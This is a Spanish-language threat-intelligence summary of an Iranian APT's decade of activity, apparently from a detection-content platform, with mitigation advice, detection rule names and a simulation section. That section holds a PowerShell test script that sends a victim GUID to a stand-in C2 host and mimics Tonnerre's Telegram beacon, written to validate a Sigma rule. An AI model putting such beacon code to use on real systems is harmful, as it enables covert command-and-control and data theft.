Prince of Persia: una revisión de 10 años sobre la actividad del APT iraní
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El informe perfila al grupo APT vinculado al estado iraní denominado Príncipe de Persia y rastrea su progresión durante la última década, con énfasis en la actividad observada desde 2023 hasta 2025. Los operadores dependen de familias de malware personalizadas, incluyendo Foudre, Tonnerre, MaxPinner, Rugissement y Deep Freeze, para apoyar el espionaje y el robo sistemático de datos. Las iteraciones recientes introducen algoritmos de generación de dominios, comando y control basado en Telegram y cargas útiles SFX encriptadas para mejorar la resiliencia y el camuflaje. Los objetivos abarcan infraestructuras críticas y redes vinculadas a disidentes en múltiples regiones.
Investigación
Investigadores de SafeBreach siguieron las operaciones del grupo desde 2019, recopilando muestras frescas, documentando la arquitectura C2 y analizando la lógica del DGA. Desencriptaron cargas útiles protegidas, extrajeron credenciales de bot de Telegram y construyeron una línea de tiempo de despliegues de variantes. La investigación destaca infraestructuras separadas de producción y pruebas y detalla comportamientos de entrega de archivos vinculados a cadenas de infección impulsadas por Excel. Los indicadores de compromiso se reunieron de hashes de malware, dominios y URLs.
Mitigación
Monitorear la actividad DNS para los patrones DGA identificados, bloquear dominios maliciosos conocidos y restringir o inspeccionar el tráfico relacionado con bots de Telegram. Añadir detecciones para los nombres de archivos de malware referenciados y artefactos de DLL loaders, y usar monitoreo/sinkholing de DNS para detectar infraestructuras rotativas. Imponer lista blanca de aplicaciones y reforzar la seguridad de Office limitando los macros para reducir la probabilidad de acceso inicial.
Respuesta
Si se encuentra algún indicador, poner en cuarentena el sistema afectado, capturar evidencia volátil y ejecutar forense dirigido en archivos depositados y rutas de registro relevantes. Bloquear todos los dominios y direcciones IP vinculados, rotar los tokens de bot de Telegram expuestos y restablecer credenciales para cuentas afectadas. Buscar en todo el entorno los restos de DLL loaders personalizados y cargas SFX cifradas para asegurar la erradicación completa.
Flujo de Ataque
Detecciones
Posible Uso Abusivo de Telegram Como Canal de Comando y Control (vía dns_query)
Ver
Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios/ Herramientas de Terceros (vía proxy)
Ver
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)
Ver
Ejecución Sospechosa de Taskkill (vía cmdline)
Ver
IOCs (HashSha256) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio Parte 2
Ver
IOCs (SourceIP) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio
Ver
IOCs (HashSha256) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio Parte 1
Ver
IOCs (HashMd5) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio
Ver
IOCs (DestinationIP) para detectar: 18 DIC 2025 Príncipe de Persia: Una Década de Actividades de Campaña APT del Estado Nación Iraní Bajo el Microscopio
Ver
Detección de Infección Foudre v34 a través de Archivo Excel con Ejecutable Embebido [Creación de Proceso de Windows]
Ver
Detección de Comunicación C2 de Foudre y Tonnerre [Conexión de Red de Windows]
Ver
Ejecución de Simulación
Prerequisito: La Verificación Previa de Telemetría y Línea Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (T1584.005) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar exactamente la telemetría esperada por la lógica de detección.
-
Narrativa del Ataque y Comandos:
El actor de la amenaza ha aprovisionado un dominio maliciosomalicious-c2.exampleque aloja el servidor C2 de Foudre/Tonnerre. La carga útil del atacante en la máquina de la víctima realiza dos solicitudes HTTP GET:- Envía el GUID de la víctima al endpoint C2 de Foudre usando el camino
/1/?c=<GUID>. - Contacta la API de Telegram a través del backdoor Tonnerre usando el camino
/t/tga.adr.
Ambas solicitudes se realizan sobre HTTP (para simplificar el registro de proxy) e incluyen un User-Agent genérico para mezclarse con el tráfico normal. Las acciones generan los campos exactos (
request_method=GET,urlconteniendo las subcadenas objetivo) que la regla Sigma busca. - Envía el GUID de la víctima al endpoint C2 de Foudre usando el camino
-
Script de Prueba de Regresión:
# ------------------------------------------------------------ # Simulación de Comunicación C2 de Foudre & Tonnerre (Windows) # ------------------------------------------------------------ # 1. Definir GUID de víctima (en una infección real, esto se leería del registro) $guid = (New-Guid).Guid # 2. Definir host C2 malicioso (reemplazar con una dirección que controles para pruebas) $c2Host = "http://malicious-c2.example" # 3. Enviar GUID al endpoint C2 de Foudre $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Enviando GUID a Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Contactar la API de Telegram vía backdoor Tonnerre $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Contactando el endpoint de API de Telegram: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Simulación completa. Verificar SIEM para alertas."El script es autónomo; ejecutarlo en un host Windows que enrute tráfico a través del proxy configurado producirá dos entradas de registro que coinciden con
url|containslas condiciones de la regla Sigma. -
Comandos de Limpieza:
# Eliminar cualquier conexión de red temporal (solo relevante si el proxy crea sesiones persistentes) # Aquí simplemente limpiamos la caché DNS para evitar resolución persistente del host malicioso. ipconfig /flushdns Write-Host "[*] Limpieza completa."